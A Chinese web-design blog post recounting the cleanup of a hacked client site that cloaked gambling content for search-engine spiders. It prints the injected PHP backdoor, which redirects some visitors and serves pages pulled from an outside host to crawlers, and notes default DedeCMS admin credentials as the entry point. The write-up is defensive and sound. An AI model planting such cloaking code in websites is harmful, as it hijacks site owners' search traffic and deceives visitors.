解決網(wǎng)站快照與網(wǎng)站實(shí)際內(nèi)容不符

2021-12-19    分類: 網(wǎng)站建設(shè)

前天 QQ上收到一個(gè)朋友發(fā)來的消息,問我在嗎,我一看是創(chuàng)業(yè)園時(shí)候的朋友,就聊了起來,他所在的公司的客戶的網(wǎng)站被入侵了

但是他和我說 他的那個(gè)客戶的網(wǎng)站不是這類的,和這個(gè)一點(diǎn)關(guān)系都沒有,我打開了域名看到的實(shí)際內(nèi)容是

是一個(gè)商業(yè)網(wǎng)站,這時(shí)候我的思路很清晰了,首先可以確定的是人和蜘蛛看到的內(nèi)容不一樣,這也是常用黑帽手法,這樣可以獲取大量的外鏈,為了進(jìn)一步確認(rèn)的我思路,我決定用蜘蛛模擬器試試結(jié)果如下圖:

果然和我想的是一樣的,這就證明了我的猜想,這種一般就是在網(wǎng)站根目錄添加一個(gè)畸形文件,讓這個(gè)畸形文件無法刪除

并且優(yōu)先級(jí)要高于網(wǎng)站本身的權(quán)限,或者是在網(wǎng)站的默認(rèn)文件檔里面加上一段代碼,來調(diào)用他的文件,來判斷來的人還是蜘蛛

如果是蜘蛛就給它顯示博采的內(nèi)容,如果是人就顯示正常的頁面,在了FTP帳號(hào)密碼 進(jìn)行一步檢查,

發(fā)現(xiàn)用的是我的第二種手法, 在文件內(nèi)加入了以下PHP代碼

$file="http://www.aoxsys.net/seo/3.html";

$referer=$_SERVER["HTTP_REFERER"];

$agent= strtolower($_SERVER["HTTP_USER_aGENT"]);

if(strstr($referer,"baidu")&&strstr($referer,"456"))

{

Header("Location: $url");

}

if ( ereg( "http://www.aoxsys.net/search/spider.htm",$agent ))

{

$content=file_get_contents($file);

echo $content;

exit;

}

>

< php

這個(gè)代碼明白的一看就知道了吧,我就不解釋了,在根目錄還發(fā)現(xiàn)一個(gè)加密的文件,那個(gè)文件貌似是博采的網(wǎng)頁內(nèi)容,命名為index.asp.asp 接下來就是替換INDEX.PHP文件 然后刪除相關(guān)后門,打上補(bǔ)丁,

但是當(dāng)我拿到網(wǎng)站后臺(tái)的帳號(hào)密碼的時(shí)候我崩潰了,密碼竟然 是默認(rèn)的,帳號(hào)也是默認(rèn)的,程序是DEDE 存在安全漏洞

修補(bǔ)漏洞 用DEDE的安全檢測(cè)工具稍微檢查了一下木馬和WEBSHELL 沒有多余發(fā)現(xiàn),打上補(bǔ)丁收工,再用蜘蛛模擬器查看

網(wǎng)站內(nèi)容和蜘蛛的爬行內(nèi)容一致了 接下來就是@蜘蛛了 讓蜘蛛過來爬 收錄并更新快照 什么怎么@蜘蛛嗎 這你都不會(huì)嗎

那我也不會(huì) 嘿嘿!

注:更多請(qǐng)關(guān)注建站教程欄目

分享名稱:解決網(wǎng)站快照與網(wǎng)站實(shí)際內(nèi)容不符
網(wǎng)站鏈接:http://muchs.cn/news/141052.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供網(wǎng)站收錄、品牌網(wǎng)站建設(shè)企業(yè)網(wǎng)站制作、網(wǎng)站導(dǎo)航、網(wǎng)站制作做網(wǎng)站

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請(qǐng)盡快告知,我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如需處理請(qǐng)聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來源: 創(chuàng)新互聯(lián)

成都網(wǎng)站建設(shè)公司